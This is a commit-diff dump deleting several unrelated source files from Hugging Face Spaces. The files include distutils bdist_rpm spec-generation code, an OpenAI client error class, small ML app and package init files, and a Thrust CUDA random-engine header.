print("doc_files =", self.doc_files)
|
285 |
-
print("changelog =", self.changelog)
|
286 |
-
|
287 |
-
# make directories
|
288 |
-
if self.spec_only:
|
289 |
-
spec_dir = self.dist_dir
|
290 |
-
self.mkpath(spec_dir)
|
291 |
-
else:
|
292 |
-
rpm_dir = {}
|
293 |
-
for d in ('SOURCES', 'SPECS', 'BUILD', 'RPMS', 'SRPMS'):
|
294 |
-
rpm_dir[d] = os.path.join(self.rpm_base, d)
|
295 |
-
self.mkpath(rpm_dir[d])
|
296 |
-
spec_dir = rpm_dir['SPECS']
|
297 |
-
|
298 |
-
# Spec file goes into 'dist_dir' if '--spec-only specified',
|
299 |
-
# build/rpm.<plat> otherwise.
|
300 |
-
spec_path = os.path.join(spec_dir, "%s.spec" % self.distribution.get_name())
|
301 |
-
self.execute(
|
302 |
-
write_file, (spec_path, self._make_spec_file()), "writing '%s'" % spec_path
|
303 |
-
)
|
304 |
-
|
305 |
-
if self.spec_only: # stop if requested
|
306 |
-
return
|
307 |
-
|
308 |
-
# Make a source distribution and copy to SOURCES directory with
|
309 |
-
# optional icon.
|
310 |
-
saved_dist_files = self.distribution.dist_files[:]
|
311 |
-
sdist = self.reinitialize_command('sdist')
|
312 |
-
if self.use_bzip2:
|
313 |
-
sdist.formats = ['bztar']
|
314 |
-
else:
|
315 |
-
sdist.formats = ['gztar']
|
316 |
-
self.run_command('sdist')
|
317 |
-
self.distribution.dist_files = saved_dist_files
|
318 |
-
|
319 |
-
source = sdist.get_archive_files()[0]
|
320 |
-
source_dir = rpm_dir['SOURCES']
|
321 |
-
self.copy_file(source, source_dir)
|
322 |
-
|
323 |
-
if self.icon:
|
324 |
-
if os.path.exists(self.icon):
|
325 |
-
self.copy_file(self.icon, source_dir)
|
326 |
-
else:
|
327 |
-
raise DistutilsFileError("icon file '%s' does not exist" % self.icon)
|
328 |
-
|
329 |
-
# build package
|
330 |
-
log.info("building RPMs")
|
331 |
-
rpm_cmd = ['rpmbuild']
|
332 |
-
|
333 |
-
if self.source_only: # what kind of RPMs?
|
334 |
-
rpm_cmd.append('-bs')
|
335 |
-
elif self.binary_only:
|
336 |
-
rpm_cmd.append('-bb')
|
337 |
-
else:
|
338 |
-
rpm_cmd.append('-ba')
|
339 |
-
rpm_cmd.extend(['--define', '__python %s' % self.python])
|
340 |
-
if self.rpm3_mode:
|
341 |
-
rpm_cmd.extend(['--define', '_topdir %s' % os.path.abspath(self.rpm_base)])
|
342 |
-
if not self.keep_temp:
|
343 |
-
rpm_cmd.append('--clean')
|
344 |
-
|
345 |
-
if self.quiet:
|
346 |
-
rpm_cmd.append('--quiet')
|
347 |
-
|
348 |
-
rpm_cmd.append(spec_path)
|
349 |
-
# Determine the binary rpm names that should be built out of this spec
|
350 |
-
# file
|
351 |
-
# Note that some of these may not be really built (if the file
|
352 |
-
# list is empty)
|
353 |
-
nvr_string = "%{name}-%{version}-%{release}"
|
354 |
-
src_rpm = nvr_string + ".src.rpm"
|
355 |
-
non_src_rpm = "%{arch}/" + nvr_string + ".%{arch}.rpm"
|
356 |
-
q_cmd = r"rpm -q --qf '{} {}\n' --specfile '{}'".format(
|
357 |
-
src_rpm,
|
358 |
-
non_src_rpm,
|
359 |
-
spec_path,
|
360 |
-
)
|
361 |
-
|
362 |
-
out = os.popen(q_cmd)
|
363 |
-
try:
|
364 |
-
binary_rpms = []
|
365 |
-
source_rpm = None
|
366 |
-
while True:
|
367 |
-
line = out.readline()
|
368 |
-
if not line:
|
369 |
-
break
|
370 |
-
ell = line.strip().split()
|
371 |
-
assert len(ell) == 2
|
372 |
-
binary_rpms.append(ell[1])
|
373 |
-
# The source rpm is named after the first entry in the spec file
|
374 |
-
if source_rpm is None:
|
375 |
-
source_rpm = ell[0]
|
376 |
-
|
377 |
-
status = out.close()
|
378 |
-
if status:
|
379 |
-
raise DistutilsExecError("Failed to execute: %s" % repr(q_cmd))
|
380 |
-
|
381 |
-
finally:
|
382 |
-
out.close()
|
383 |
-
|
384 |
-
self.spawn(rpm_cmd)
|
385 |
-
|
386 |
-
if not self.dry_run:
|
387 |
-
if self.distribution.has_ext_modules():
|
388 |
-
pyversion = get_python_version()
|
389 |
-
else:
|
390 |
-
pyversion = 'any'
|
391 |
-
|
392 |
-
if not self.binary_only:
|
393 |
-
srpm = os.path.join(rpm_dir['SRPMS'], source_rpm)
|
394 |
-
assert os.path.exists(srpm)
|
395 |
-
self.move_file(srpm, self.dist_dir)
|
396 |
-
filename = os.path.join(self.dist_dir, source_rpm)
|
397 |
-
self.distribution.dist_files.append(('bdist_rpm', pyversion, filename))
|
398 |
-
|
399 |
-
if not self.source_only:
|
400 |
-
for rpm in binary_rpms:
|
401 |
-
rpm = os.path.join(rpm_dir['RPMS'], rpm)
|
402 |
-
if os.path.exists(rpm):
|
403 |
-
self.move_file(rpm, self.dist_dir)
|
404 |
-
filename = os.path.join(self.dist_dir, os.path.basename(rpm))
|
405 |
-
self.distribution.dist_files.append(
|
406 |
-
('bdist_rpm', pyversion, filename)
|
407 |
-
)
|
408 |
-
|
409 |
-
def _dist_path(self, path):
|
410 |
-
return os.path.join(self.dist_dir, os.path.basename(path))
|
411 |
-
|
412 |
-
def _make_spec_file(self): # noqa: C901
|
413 |
-
"""Generate the text of an RPM spec file and return it as a
|
414 |
-
list of strings (one per line).
|
415 |
-
"""
|
416 |
-
# definitions and headers
|
417 |
-
spec_file = [
|
418 |
-
'%define name ' + self.distribution.get_name(),
|
419 |
-
'%define version ' + self.distribution.get_version().replace('-', '_'),
|
420 |
-
'%define unmangled_version ' + self.distribution.get_version(),
|
421 |
-
'%define release ' + self.release.replace('-', '_'),
|
422 |
-
'',
|
423 |
-
'Summary: ' + (self.distribution.get_description() or "UNKNOWN"),
|
424 |
-
]
|
425 |
-
|
426 |
-
# Workaround for #14443 which affects some RPM based systems such as
|
427 |
-
# RHEL6 (and probably derivatives)
|
428 |
-
vendor_hook = subprocess.getoutput('rpm --eval %{__os_install_post}')
|
429 |
-
# Generate a potential replacement value for __os_install_post (whilst
|
430 |
-
# normalizing the whitespace to simplify the test for whether the
|
431 |
-
# invocation of brp-python-bytecompile passes in __python):
|
432 |
-
vendor_hook = '\n'.join(
|
433 |
-
[' %s \\' % line.strip() for line in vendor_hook.splitlines()]
|
434 |
-
)
|
435 |
-
problem = "brp-python-bytecompile \\\n"
|
436 |
-
fixed = "brp-python-bytecompile %{__python} \\\n"
|
437 |
-
fixed_hook = vendor_hook.replace(problem, fixed)
|
438 |
-
if fixed_hook != vendor_hook:
|
439 |
-
spec_file.append('# Workaround for http://bugs.python.org/issue14443')
|
440 |
-
spec_file.append('%define __os_install_post ' + fixed_hook + '\n')
|
441 |
-
|
442 |
-
# put locale summaries into spec file
|
443 |
-
# XXX not supported for now (hard to put a dictionary
|
444 |
-
# in a config file -- arg!)
|
445 |
-
# for locale in self.summaries.keys():
|
446 |
-
# spec_file.append('Summary(%s): %s' % (locale,
|
447 |
-
# self.summaries[locale]))
|
448 |
-
|
449 |
-
spec_file.extend(
|
450 |
-
[
|
451 |
-
'Name: %{name}',
|
452 |
-
'Version: %{version}',
|
453 |
-
'Release: %{release}',
|
454 |
-
]
|
455 |
-
)
|
456 |
-
|
457 |
-
# XXX yuck! this filename is available from the "sdist" command,
|
458 |
-
# but only after it has run: and we create the spec file before
|
459 |
-
# running "sdist", in case of --spec-only.
|
460 |
-
if self.use_bzip2:
|
461 |
-
spec_file.append('Source0: %{name}-%{unmangled_version}.tar.bz2')
|
462 |
-
else:
|
463 |
-
spec_file.append('Source0: %{name}-%{unmangled_version}.tar.gz')
|
464 |
-
|
465 |
-
spec_file.extend(
|
466 |
-
[
|
467 |
-
'License: ' + (self.distribution.get_license() or "UNKNOWN"),
|
468 |
-
'Group: ' + self.group,
|
469 |
-
'BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-buildroot',
|
470 |
-
'Prefix: %{_prefix}',
|
471 |
-
]
|
472 |
-
)
|
473 |
-
|
474 |
-
if not self.force_arch:
|
475 |
-
# noarch if no extension modules
|
476 |
-
if not self.distribution.has_ext_modules():
|
477 |
-
spec_file.append('BuildArch: noarch')
|
478 |
-
else:
|
479 |
-
spec_file.append('BuildArch: %s' % self.force_arch)
|
480 |
-
|
481 |
-
for field in (
|
482 |
-
'Vendor',
|
483 |
-
'Packager',
|
484 |
-
'Provides',
|
485 |
-
'Requires',
|
486 |
-
'Conflicts',
|
487 |
-
'Obsoletes',
|
488 |
-
):
|
489 |
-
val = getattr(self, field.lower())
|
490 |
-
if isinstance(val, list):
|
491 |
-
spec_file.append('{}: {}'.format(field, ' '.join(val)))
|
492 |
-
elif val is not None:
|
493 |
-
spec_file.append('{}: {}'.format(field, val))
|
494 |
-
|
495 |
-
if self.distribution.get_url():
|
496 |
-
spec_file.append('Url: ' + self.distribution.get_url())
|
497 |
-
|
498 |
-
if self.distribution_name:
|
499 |
-
spec_file.append('Distribution: ' + self.distribution_name)
|
500 |
-
|
501 |
-
if self.build_requires:
|
502 |
-
spec_file.append('BuildRequires: ' + ' '.join(self.build_requires))
|
503 |
-
|
504 |
-
if self.icon:
|
505 |
-
spec_file.append('Icon: ' + os.path.basename(self.icon))
|
506 |
-
|
507 |
-
if self.no_autoreq:
|
508 |
-
spec_file.append('AutoReq: 0')
|
509 |
-
|
510 |
-
spec_file.extend(
|
511 |
-
[
|
512 |
-
'',
|
513 |
-
'%description',
|
514 |
-
self.distribution.get_long_description() or "",
|
515 |
-
]
|
516 |
-
)
|
517 |
-
|
518 |
-
# put locale descriptions into spec file
|
519 |
-
# XXX again, suppressed because config file syntax doesn't
|
520 |
-
# easily support this ;-(
|
521 |
-
# for locale in self.descriptions.keys():
|
522 |
-
# spec_file.extend([
|
523 |
-
# '',
|
524 |
-
# '%description -l ' + locale,
|
525 |
-
# self.descriptions[locale],
|
526 |
-
# ])
|
527 |
-
|
528 |
-
# rpm scripts
|
529 |
-
# figure out default build script
|
530 |
-
def_setup_call = "{} {}".format(self.python, os.path.basename(sys.argv[0]))
|
531 |
-
def_build = "%s build" % def_setup_call
|
532 |
-
if self.use_rpm_opt_flags:
|
533 |
-
def_build = 'env CFLAGS="$RPM_OPT_FLAGS" ' + def_build
|
534 |
-
|
535 |
-
# insert contents of files
|
536 |
-
|
537 |
-
# XXX this is kind of misleading: user-supplied options are files
|
538 |
-
# that we open and interpolate into the spec file, but the defaults
|
539 |
-
# are just text that we drop in as-is. Hmmm.
|
540 |
-
|
541 |
-
install_cmd = (
|
542 |
-
'%s install -O1 --root=$RPM_BUILD_ROOT ' '--record=INSTALLED_FILES'
|
543 |
-
) % def_setup_call
|
544 |
-
|
545 |
-
script_options = [
|
546 |
-
('prep', 'prep_script', "%setup -n %{name}-%{unmangled_version}"),
|
547 |
-
('build', 'build_script', def_build),
|
548 |
-
('install', 'install_script', install_cmd),
|
549 |
-
('clean', 'clean_script', "rm -rf $RPM_BUILD_ROOT"),
|
550 |
-
('verifyscript', 'verify_script', None),
|
551 |
-
('pre', 'pre_install', None),
|
552 |
-
('post', 'post_install', None),
|
553 |
-
('preun', 'pre_uninstall', None),
|
554 |
-
('postun', 'post_uninstall', None),
|
555 |
-
]
|
556 |
-
|
557 |
-
for (rpm_opt, attr, default) in script_options:
|
558 |
-
# Insert contents of file referred to, if no file is referred to
|
559 |
-
# use 'default' as contents of script
|
560 |
-
val = getattr(self, attr)
|
561 |
-
if val or default:
|
562 |
-
spec_file.extend(
|
563 |
-
[
|
564 |
-
'',
|
565 |
-
'%' + rpm_opt,
|
566 |
-
]
|
567 |
-
)
|
568 |
-
if val:
|
569 |
-
with open(val) as f:
|
570 |
-
spec_file.extend(f.read().split('\n'))
|
571 |
-
else:
|
572 |
-
spec_file.append(default)
|
573 |
-
|
574 |
-
# files section
|
575 |
-
spec_file.extend(
|
576 |
-
[
|
577 |
-
'',
|
578 |
-
'%files -f INSTALLED_FILES',
|
579 |
-
'%defattr(-,root,root)',
|
580 |
-
]
|
581 |
-
)
|
582 |
-
|
583 |
-
if self.doc_files:
|
584 |
-
spec_file.append('%doc ' + ' '.join(self.doc_files))
|
585 |
-
|
586 |
-
if self.changelog:
|
587 |
-
spec_file.extend(
|
588 |
-
[
|
589 |
-
'',
|
590 |
-
'%changelog',
|
591 |
-
]
|
592 |
-
)
|
593 |
-
spec_file.extend(self.changelog)
|
594 |
-
|
595 |
-
return spec_file
|
596 |
-
|
597 |
-
def _format_changelog(self, changelog):
|
598 |
-
"""Format the changelog correctly and convert it to a list of strings"""
|
599 |
-
if not changelog:
|
600 |
-
return changelog
|
601 |
-
new_changelog = []
|
602 |
-
for line in changelog.strip().split('\n'):
|
603 |
-
line = line.strip()
|
604 |
-
if line[0] == '*':
|
605 |
-
new_changelog.extend(['', line])
|
606 |
-
elif line[0] == '-':
|
607 |
-
new_changelog.append(line)
|
608 |
-
else:
|
609 |
-
new_changelog.append(' ' + line)
|
610 |
-
|
611 |
-
# strip trailing newline inserted by first changelog entry
|
612 |
-
if not new_changelog[0]:
|
613 |
-
del new_changelog[0]
|
614 |
-
|
615 |
-
return new_changelog
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Boadiwaa/Recipes/openai/api_resources/error_object.py
DELETED
@@ -1,22 +0,0 @@
|
|
1 |
-
from typing import Optional
|
2 |
-
|
3 |
-
from openai.openai_object import OpenAIObject
|
4 |
-
from openai.util import merge_dicts
|
5 |
-
|
6 |
-
|
7 |
-
class ErrorObject(OpenAIObject):
|
8 |
-
def refresh_from(
|
9 |
-
self,
|
10 |
-
values,
|
11 |
-
api_key=None,
|
12 |
-
api_version=None,
|
13 |
-
organization=None,
|
14 |
-
response_ms: Optional[int] = None,
|
15 |
-
):
|
16 |
-
# Unlike most other API resources, the API will omit attributes in
|
17 |
-
# error objects when they have a null value. We manually set default
|
18 |
-
# values here to facilitate generic error handling.
|
19 |
-
values = merge_dicts({"message": None, "type": None}, values)
|
20 |
-
return super(ErrorObject, self).refresh_from(
|
21 |
-
values, api_key, api_version, organization, response_ms
|
22 |
-
)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/BorisovMaksim/denoising/denoisers/__init__.py
DELETED
@@ -1,14 +0,0 @@
|
|
1 |
-
from denoisers.demucs import Demucs
|
2 |
-
from denoisers.SpectralGating import SpectralGating
|
3 |
-
|
4 |
-
|
5 |
-
MODEL_POOL = {
|
6 |
-
'demucs': Demucs,
|
7 |
-
'baseline': SpectralGating
|
8 |
-
}
|
9 |
-
|
10 |
-
|
11 |
-
def get_model(model_config):
|
12 |
-
name, params = list(model_config.items())[0]
|
13 |
-
return MODEL_POOL[name](params)
|
14 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/BradAllgood/fastai_chapter2_new/app.py
DELETED
@@ -1,28 +0,0 @@
|
|
1 |
-
import gradio as gr
|
2 |
-
from fastai.vision.all import *
|
3 |
-
import pathlib
|
4 |
-
plt = platform.system()
|
5 |
-
if plt == 'Windows': pathlib.PosixPath = pathlib.WindowsPath
|
6 |
-
|
7 |
-
def is_cat(x): return x[0].isupper()
|
8 |
-
|
9 |
-
def greet(name):
|
10 |
-
return "Hello " + name + "!!"
|
11 |
-
|
12 |
-
learn = load_learner('is_cat_model.pkl')
|
13 |
-
|
14 |
-
|
15 |
-
categories = ('Dog','Cat')
|
16 |
-
|
17 |
-
def classify_image(img):
|
18 |
-
pred,idx,probs = learn.predict(img)
|
19 |
-
return dict(zip(categories,map(float,probs)))
|
20 |
-
|
21 |
-
image = gr.inputs.Image(shape=(192,192))
|
22 |
-
label = gr.outputs.Label()
|
23 |
-
examples = ['dog.jpg','cat.jpg','dunno.jpg']
|
24 |
-
|
25 |
-
intf = gr.Interface(fn=classify_image, inputs = image, outputs= label, examples = examples, theme=gr.themes.Soft())
|
26 |
-
|
27 |
-
intf.launch(inline=False)
|
28 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/.github/pull_request_template.md
DELETED
@@ -1,8 +0,0 @@
|
|
1 |
-
Thanks for your contribution!
|
2 |
-
|
3 |
-
If you're sending a large PR (e.g., >50 lines),
|
4 |
-
please open an issue first about the feature / bug, and indicate how you want to contribute.
|
5 |
-
See more at https://detectron2.readthedocs.io/notes/contributing.html#pull-requests
|
6 |
-
about how we handle PRs.
|
7 |
-
|
8 |
-
Before submitting a PR, please run `dev/linter.sh` to lint the code.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/modeling/__init__.py
DELETED
@@ -1,56 +0,0 @@
|
|
1 |
-
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
|
2 |
-
import torch
|
3 |
-
|
4 |
-
from detectron2.layers import ShapeSpec
|
5 |
-
|
6 |
-
from .anchor_generator import build_anchor_generator, ANCHOR_GENERATOR_REGISTRY
|
7 |
-
from .backbone import (
|
8 |
-
BACKBONE_REGISTRY,
|
9 |
-
FPN,
|
10 |
-
Backbone,
|
11 |
-
ResNet,
|
12 |
-
ResNetBlockBase,
|
13 |
-
build_backbone,
|
14 |
-
build_resnet_backbone,
|
15 |
-
make_stage,
|
16 |
-
)
|
17 |
-
from .meta_arch import (
|
18 |
-
META_ARCH_REGISTRY,
|
19 |
-
SEM_SEG_HEADS_REGISTRY,
|
20 |
-
GeneralizedRCNN,
|
21 |
-
PanopticFPN,
|
22 |
-
ProposalNetwork,
|
23 |
-
RetinaNet,
|
24 |
-
SemanticSegmentor,
|
25 |
-
build_model,
|
26 |
-
build_sem_seg_head,
|
27 |
-
)
|
28 |
-
from .postprocessing import detector_postprocess
|
29 |
-
from .proposal_generator import (
|
30 |
-
PROPOSAL_GENERATOR_REGISTRY,
|
31 |
-
build_proposal_generator,
|
32 |
-
RPN_HEAD_REGISTRY,
|
33 |
-
build_rpn_head,
|
34 |
-
)
|
35 |
-
from .roi_heads import (
|
36 |
-
ROI_BOX_HEAD_REGISTRY,
|
37 |
-
ROI_HEADS_REGISTRY,
|
38 |
-
ROI_KEYPOINT_HEAD_REGISTRY,
|
39 |
-
ROI_MASK_HEAD_REGISTRY,
|
40 |
-
ROIHeads,
|
41 |
-
StandardROIHeads,
|
42 |
-
BaseMaskRCNNHead,
|
43 |
-
BaseKeypointRCNNHead,
|
44 |
-
build_box_head,
|
45 |
-
build_keypoint_head,
|
46 |
-
build_mask_head,
|
47 |
-
build_roi_heads,
|
48 |
-
)
|
49 |
-
from .test_time_augmentation import DatasetMapperTTA, GeneralizedRCNNWithTTA
|
50 |
-
|
51 |
-
_EXCLUDE = {"torch", "ShapeSpec"}
|
52 |
-
__all__ = [k for k in globals().keys() if k not in _EXCLUDE and not k.startswith("_")]
|
53 |
-
|
54 |
-
assert (
|
55 |
-
torch.Tensor([1]) == torch.Tensor([2])
|
56 |
-
).dtype == torch.bool, "Your Pytorch is too old. Please update to contain https://github.com/pytorch/pytorch/pull/21113"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/GFPGAN-example/gfpgan/__init__.py
DELETED
@@ -1,7 +0,0 @@
|
|
1 |
-
# flake8: noqa
|
2 |
-
from .archs import *
|
3 |
-
from .data import *
|
4 |
-
from .models import *
|
5 |
-
from .utils import *
|
6 |
-
|
7 |
-
# from .version import *
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/LIVE/thrust/thrust/random/detail/linear_congruential_engine_discard.h
DELETED
@@ -1,107 +0,0 @@
|
|
1 |
-
/*
|
2 |
-
* Copyright 2008-2013 NVIDIA Corporation
|
3 |
-
*
|
4 |
-
* Licensed under the Apache License, Version 2.0 (the "License");
|
5 |
-
* you may not use this file except in compliance with the License.
|
6 |
-
* You may obtain a copy of the License at
|
7 |
-
*
|
8 |
-
* http://www.apache.org/licenses/LICENSE-2.0
|
9 |
-
*
|
10 |
-
* Unless required by applicable law or agreed to in writing, software
|
11 |
-
* distributed under the License is distributed on an "AS IS" BASIS,
|
12 |
-
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
13 |
-
* See the License for the specific language governing permissions and
|
14 |
-
* limitations under the License.
|
15 |
-
*/
|
16 |
-
|
17 |
-
#pragma once
|
18 |
-
|
19 |
-
#include <thrust/detail/cstdint.h>
|
20 |
-
#include <thrust/random/detail/mod.h>
|
21 |
-
|
22 |
-
namespace thrust
|
23 |
-
{
|
24 |
-
|
25 |
-
namespace random
|
26 |
-
{
|
27 |
-
|
28 |
-
namespace detail
|
29 |
-
{
|
30 |
-
|
31 |
-
|
32 |
-
template<typename UIntType, UIntType a, unsigned long long c, UIntType m>
|
33 |
-
struct linear_congruential_engine_discard_implementation
|
34 |
-
{
|
35 |
-
__host__ __device__
|
36 |
-
static void discard(UIntType &state, unsigned long long z)
|
37 |
-
{
|
38 |
-
for(; z > 0; --z)
|
39 |
-
{
|
40 |
-
state = detail::mod<UIntType,a,c,m>(state);
|
41 |
-
}
|
42 |
-
}
|
43 |
-
}; // end linear_congruential_engine_discard
|
44 |
-
|
45 |
-
|
46 |
-
// specialize for small integers and c == 0
|
47 |
-
// XXX figure out a robust implemenation of this for any unsigned integer type later
|
48 |
-
template<thrust::detail::uint32_t a, thrust::detail::uint32_t m>
|
49 |
-
struct linear_congruential_engine_discard_implementation<thrust::detail::uint32_t,a,0,m>
|
50 |
-
{
|
51 |
-
__host__ __device__
|
52 |
-
static void discard(thrust::detail::uint32_t &state, unsigned long long z)
|
53 |
-
{
|
54 |
-
const thrust::detail::uint32_t modulus = m;
|
55 |
-
|
56 |
-
// XXX we need to use unsigned long long here or we will encounter overflow in the
|
57 |
-
// multiplies below
|
58 |
-
// figure out a robust implementation of this later
|
59 |
-
unsigned long long multiplier = a;
|
60 |
-
unsigned long long multiplier_to_z = 1;
|
61 |
-
|
62 |
-
// see http://en.wikipedia.org/wiki/Modular_exponentiation
|
63 |
-
while(z > 0)
|
64 |
-
{
|
65 |
-
if(z & 1)
|
66 |
-
{
|
67 |
-
// multiply in this bit's contribution while using modulus to keep result small
|
68 |
-
multiplier_to_z = (multiplier_to_z * multiplier) % modulus;
|
69 |
-
}
|
70 |
-
|
71 |
-
// move to the next bit of the exponent, square (and mod) the base accordingly
|
72 |
-
z >>= 1;
|
73 |
-
multiplier = (multiplier * multiplier) % modulus;
|
74 |
-
}
|
75 |
-
|
76 |
-
state = static_cast<thrust::detail::uint32_t>((multiplier_to_z * state) % modulus);
|
77 |
-
}
|
78 |
-
}; // end linear_congruential_engine_discard
|
79 |
-
|
80 |
-
|
81 |
-
struct linear_congruential_engine_discard
|
82 |
-
{
|
83 |
-
template<typename LinearCongruentialEngine>
|
84 |
-
__host__ __device__
|
85 |
-
static void discard(LinearCongruentialEngine &lcg, unsigned long long z)
|
86 |
-
{
|
87 |
-
typedef typename LinearCongruentialEngine::result_type result_type;
|
88 |
-
const result_type c = LinearCongruentialEngine::increment;
|
89 |
-
const result_type a = LinearCongruentialEngine::multiplier;
|
90 |
-
const result_type m = LinearCongruentialEngine::modulus;
|
91 |
-
|
92 |
-
// XXX WAR unused variable warnings
|
93 |
-
(void) c;
|
94 |
-
(void) a;
|
95 |
-
(void) m;
|
96 |
-
|
97 |
-
linear_congruential_engine_discard_implementation<result_type,a,c,m>::discard(lcg.m_x, z);
|
98 |
-
}
|
99 |
-
}; // end linear_congruential_engine_discard
|
100 |
-
|
101 |
-
|
102 |
-
} // end detail
|
103 |
-
|
104 |
-
} // end random
|
105 |
-
|
106 |
-
} // end thrust
|
107 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
